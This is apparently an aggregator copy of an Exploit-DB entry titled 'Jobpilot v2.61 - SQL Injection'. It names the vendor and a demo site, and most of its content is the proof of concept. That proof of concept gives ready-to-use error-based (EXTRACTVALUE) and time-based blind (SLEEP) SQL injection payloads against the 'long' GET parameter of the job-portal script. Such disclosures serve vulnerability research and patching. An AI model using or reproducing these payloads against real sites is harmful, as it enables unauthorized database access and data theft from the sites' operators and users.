2

[webapps] Jobpilot v2.61 - SQL Injection

 1 year ago
source link: https://www.exploit-db.com/exploits/51527
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Jobpilot v2.61 - SQL Injection

EDB-ID:

51527

EDB Verified:

Platform:

PHP

Date:

2023-06-19

Vulnerable App:

# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Parameter: long (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
(ELT(4894=4894,1))),0x71786b7171)) AND
(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK